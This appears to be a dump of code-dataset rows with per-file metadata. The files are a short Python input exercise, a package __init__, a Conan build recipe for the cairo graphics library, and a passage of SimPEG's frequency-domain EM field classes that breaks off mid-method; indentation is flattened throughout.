| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18914f8c6a7118c8b912c78ac9f81d9599133f5c
| 272
|
py
|
Python
|
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
PYTHON/pythonDesafios/desafio057.py
|
Santos1000/Curso-Python
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
[
"MIT"
] | null | null | null |
# Note: taking [0] assumes non-empty input; an empty line would raise IndexError.
sexo = str(input('Type (F) or (M) to indicate female or male: ')).upper().strip()[0]
while sexo not in 'FM':  # input is already uppercased, so only 'F'/'M' remain
sexo = str(input('Type (F) or (M) to indicate female or male: ')).upper().strip()[0]
print('Thank you! Sex registered')
| 68
| 109
| 0.665441
| 43
| 272
| 4.209302
| 0.534884
| 0.077348
| 0.132597
| 0.220994
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0
| 0.008734
| 0.158088
| 272
| 4
| 110
| 68
| 0.781659
| 0
| 0
| 0.5
| 0
| 0
| 0.553114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18a1815cdbb9b1535638c94583e00d5917a09f9c
| 116
|
py
|
Python
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 70
|
2021-04-13T20:13:35.000Z
|
2021-07-08T03:01:29.000Z
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 18
|
2021-07-13T22:06:11.000Z
|
2022-01-27T16:27:37.000Z
|
collie/movielens/__init__.py
|
RomaKoks/collie_recs
|
bc8979c8dbf68deefb030336d50f07f788cf1667
|
[
"BSD-3-Clause"
] | 11
|
2021-07-14T04:58:49.000Z
|
2022-03-05T00:19:22.000Z
|
from collie.movielens.get_data import *
from collie.movielens.run import *
from collie.movielens.visualize import *
| 29
| 40
| 0.818966
| 16
| 116
| 5.875
| 0.5
| 0.319149
| 0.606383
| 0.531915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 116
| 3
| 41
| 38.666667
| 0.903846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
18d6e7220d177b964762f0c9b18d552114bc423c
| 12,260
|
py
|
Python
|
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
cairo/conanfile.py
|
popescu-af/conan-recipes
|
ad3f2eb10ebc4d75357f730374e5f554a577d3aa
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os, shutil
cmakelists_txt="""\
project(cairo LANGUAGES C)
cmake_minimum_required(VERSION 3.5)
if(CMAKE_COMPILER_IS_GNUCC)
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -O2 -w -fPIC")
endif()
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
if(NOT CMAKE_BUILD_TYPE)
message(STATUS "Setting CMAKE_BUILD_TYPE to Release")
set(CMAKE_BUILD_TYPE Release)
endif()
# @todo: Hardcoded list for now - sources should be chosen based on compile flags/options.
set(CAIRO_SRC
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-analysis-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-arc.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-array.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-atomic.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-base64-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-base85-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann-rectangular.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-bentley-ottmann-rectilinear.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-botor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-boxes-intersect.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-cache.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-region.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-color.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-composite-rectangles.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-contour.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-damage.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-debug.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-default-context.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-device.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-error.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-fallback-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-fixed.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face-twin.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-face-twin-data.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-font-options.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-freelist.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-freed-pool.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-gstate.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-hash.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-hull.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-info.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-source.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-image-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-line.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-lzw.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-matrix.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mask-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mesh-pattern-rasterizer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mempool.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-misc.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mono-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-mutex.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-no-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-observer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-output-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-paginated-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-bounds.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-fill.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-fixed.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-in-fill.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-boxes.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-traps.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-path-stroke-tristrip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pattern.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon-intersect.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-polygon-reduce.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-raster-source-pattern.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-recording-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rectangle.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rectangular-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-region.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-rtree.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-scaled-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-shape-mask-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-slope.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spans.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spans-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-spline.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-stroke-dash.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-stroke-style.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-clipper.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-fallback.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-observer.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-offset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-snapshot.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-subsurface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-surface-wrapper.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-time.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tor22-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-clip-tor-scan-converter.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-toy-font-face.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-traps.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-tristrip.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-traps-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-unicode.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-user-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-version.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-wideint.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-cff-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-scaled-font-subsets.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-truetype-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-fallback.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-glyph-names.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type1-subset.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-type3-glyph-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-operators.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-shading.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-deflate-stream.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-display.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-core-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-fallback-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-render-compositor.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-screen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-source.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-surface-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-visual.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xlib-xcb-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-core.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-render.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-connection-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-screen.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-shm.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface-core.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-surface-render.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-xcb-resources.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-png.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-script-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-ft-font.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-ps-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-pdf-surface.c
${CMAKE_CURRENT_SOURCE_DIR}/cairo/src/cairo-svg-surface.c
)
if(BUILD_SHARED_LIBS)
add_library(${PROJECT_NAME} SHARED ${CAIRO_SRC})
set_target_properties(${PROJECT_NAME} PROPERTIES POSITION_INDEPENDENT_CODE ON)
else()
add_library(${PROJECT_NAME} STATIC ${CAIRO_SRC})
endif()
target_compile_definitions(${PROJECT_NAME} PRIVATE HAVE_CONFIG_H=1)
target_include_directories(${PROJECT_NAME} SYSTEM
PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/cairo
PRIVATE ${CONAN_INCLUDE_DIRS_PIXMAN}/pixman #Hack for #include <pixman.h> in cairo sources
)
target_link_libraries(${PROJECT_NAME} ${CONAN_LIBS})
if(UNIX)
target_link_libraries(${PROJECT_NAME}
X11 Xrender Xext X11-xcb xcb xcb-render xcb-shm
fontconfig
)
endif()
"""
class CairoConan(ConanFile):
name = "cairo"
description = "2D graphics library with support for multiple output devices"
version = "1.14.8"
license = "LGPL 2.1"
exports = "*"
url = "https://github.com/popescu-af/conan-recipes"
settings = "os", "compiler", "build_type", "arch"
requires = "pixman/0.34.0@popescu-af/testing", "freetype/2.6.3@lasote/stable"
build_policy = "missing"
options = {"shared": [True, False]}
default_options = "shared=True"
generators = "cmake"
def configure(self):
self.options["pixman"].shared = "True"
self.options["freetype"].shared = "True"
def source(self):
self.run("wget https://www.cairographics.org/releases/cairo-%s.tar.xz -O cairo.tar.xz" % self.version)
self.run("tar -xvf cairo.tar.xz && mv cairo-%s cairo && cd cairo && ./configure" % self.version)
# Create CMakeLists.txt file
with open("CMakeLists.txt", "w") as f:
f.write(cmakelists_txt)
def build(self):
cmake = CMake(self.settings)
shared = "-DBUILD_SHARED_LIBS=ON" if self.options.shared else ""
self.run('cmake . %s %s' % (cmake.command_line, shared))
self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("cairo.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-deprecated.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-features.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-ft.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-pdf.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-ps.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-script.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-svg.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-version.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xcb.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xlib.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xlib-xrender.h", dst="include/cairo", src="cairo/src")
self.copy("*cairo.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["cairo"]
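# Illustrative invocation -- a sketch, not part of the recipe. The file uses
# the Conan 1.x API (conans.ConanFile, CMake(self.settings)), so with Conan
# 1.x installed the package would be created with:
#
#     conan create . popescu-af/testing
#
# which exports the recipe, downloads the cairo tarball in source(), and
# builds it through the generated CMakeLists.txt above.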
| 51.512605
| 110
| 0.764274
| 1,914
| 12,260
| 4.638454
| 0.147858
| 0.151385
| 0.224037
| 0.335886
| 0.748254
| 0.734062
| 0.734062
| 0.72415
| 0.582226
| 0.270106
| 0
| 0.002851
| 0.084421
| 12,260
| 237
| 111
| 51.729958
| 0.788062
| 0.002121
| 0
| 0.018018
| 0
| 0.004505
| 0.871403
| 0.714274
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022523
| false
| 0
| 0.009009
| 0
| 0.09009
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e171a5c5c8613d2389889230e3d49759bb78b616
| 30,456
|
py
|
Python
|
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | 1
|
2020-11-27T03:26:22.000Z
|
2020-11-27T03:26:22.000Z
|
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | null | null | null |
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
import SimPEG
from SimPEG import Utils
from SimPEG.EM.Utils import omega
from SimPEG.Utils import Zero, Identity
class Fields(SimPEG.Problem.Fields):
"""
Fancy Field Storage for an FDEM survey. Only one field type is stored for
each problem, the rest are computed. The fields object acts like an array and is indexed by
.. code-block:: python
f = problem.fields(m)
e = f[srcList,'e']
b = f[srcList,'b']
If accessing all sources for a given field, use the :code:`:`
.. code-block:: python
f = problem.fields(m)
e = f[:,'e']
b = f[:,'b']
The array returned will be size (nE or nF, nSrcs :math:`\\times` nFrequencies)
"""
knownFields = {}
dtype = complex
class Fields_e(Fields):
"""
Fields object for Problem_e.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'eSolution':'E'}
aliasFields = {
'e' : ['eSolution','E','_e'],
'ePrimary' : ['eSolution','E','_ePrimary'],
'eSecondary' : ['eSolution','E','_eSecondary'],
'b' : ['eSolution','F','_b'],
'bPrimary' : ['eSolution','F','_bPrimary'],
'bSecondary' : ['eSolution','F','_bSecondary']
}
def __init__(self,mesh,survey,**kwargs):
Fields.__init__(self,mesh,survey,**kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
def _ePrimary(self, eSolution, srcList):
"""
Primary electric field from source
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros_like(eSolution)
for i, src in enumerate(srcList):
ep = src.ePrimary(self.prob)
ePrimary[:,i] = ePrimary[:,i] + ep
return ePrimary
def _eSecondary(self, eSolution, srcList):
"""
Secondary electric field is the thing we solved for
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
return eSolution
def _e(self, eSolution, srcList):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
return self._ePrimary(eSolution,srcList) + self._eSecondary(eSolution,srcList)
def _eDeriv_u(self, src, v, adjoint = False):
"""
Derivative of the total electric field with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect to the field we solved for with a vector
"""
return Identity()*v
def _eDeriv_m(self, src, v, adjoint = False):
"""
Derivative of the total electric field with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the electric field derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _bPrimary(self, eSolution, srcList):
"""
Primary magnetic flux density from source
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic flux density as defined by the sources
"""
bPrimary = np.zeros([self._edgeCurl.shape[0],eSolution.shape[1]],dtype = complex)
for i, src in enumerate(srcList):
bp = src.bPrimary(self.prob)
bPrimary[:,i] = bPrimary[:,i] + bp
return bPrimary
def _bSecondary(self, eSolution, srcList):
"""
Secondary magnetic flux density from eSolution
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
C = self._edgeCurl
b = (C * eSolution)
for i, src in enumerate(srcList):
b[:,i] *= - 1./(1j*omega(src.freq))
S_m, _ = src.eval(self.prob)
b[:,i] = b[:,i]+ 1./(1j*omega(src.freq)) * S_m
return b
def _bSecondaryDeriv_u(self, src, v, adjoint = False):
"""
Derivative of the secondary magnetic flux density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic flux density with respect to the field we solved for with a vector
"""
C = self._edgeCurl
if adjoint:
return - 1./(1j*omega(src.freq)) * (C.T * v)
return - 1./(1j*omega(src.freq)) * (C * v)
def _bSecondaryDeriv_m(self, src, v, adjoint = False):
"""
Derivative of the secondary magnetic flux density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the secondary magnetic flux density derivative with respect to the inversion model with a vector
"""
S_mDeriv, _ = src.evalDeriv(self.prob, v, adjoint)
return 1./(1j * omega(src.freq)) * S_mDeriv
def _b(self, eSolution, srcList):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
return self._bPrimary(eSolution, srcList) + self._bSecondary(eSolution, srcList)
def _bDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with respect to the field we solved for with a vector
"""
# Primary does not depend on u
return self._bSecondaryDeriv_u(src, v, adjoint)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic flux density derivative with respect to the inversion model with a vector
"""
# Assuming the primary does not depend on the model
return self._bSecondaryDeriv_m(src, v, adjoint)
class Fields_b(Fields):
"""
Fields object for Problem_b.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'bSolution':'F'}
aliasFields = {
'b' : ['bSolution','F','_b'],
'bPrimary' : ['bSolution','F','_bPrimary'],
'bSecondary' : ['bSolution','F','_bSecondary'],
'e' : ['bSolution','E','_e'],
'ePrimary' : ['bSolution','E','_ePrimary'],
'eSecondary' : ['bSolution','E','_eSecondary'],
}
def __init__(self, mesh, survey, **kwargs):
Fields.__init__(self, mesh, survey, **kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeSigmaI = self.survey.prob.MeSigmaI
self._MfMui = self.survey.prob.MfMui
self._MeSigmaIDeriv = self.survey.prob.MeSigmaIDeriv
self._Me = self.survey.prob.Me
def _bPrimary(self, bSolution, srcList):
"""
Primary magnetic flux density from source
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic flux density as defined by the sources
"""
bPrimary = np.zeros_like(bSolution)
for i, src in enumerate(srcList):
bp = src.bPrimary(self.prob)
bPrimary[:,i] = bPrimary[:,i] + bp
return bPrimary
def _bSecondary(self, bSolution, srcList):
"""
Secondary magnetic flux density is the thing we solved for
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
return bSolution
def _b(self, bSolution, srcList):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
return self._bPrimary(bSolution, srcList) + self._bSecondary(bSolution, srcList)
def _bDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with respect to the field we solved for with a vector
"""
return Identity()*v
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic flux density derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _ePrimary(self, bSolution, srcList):
"""
Primary electric field from source
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros([self._edgeCurl.shape[1], bSolution.shape[1]], dtype=complex)
for i, src in enumerate(srcList):
ep = src.ePrimary(self.prob)
ePrimary[:,i] = ePrimary[:,i] + ep
return ePrimary
def _eSecondary(self, bSolution, srcList):
"""
Secondary electric field from bSolution
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
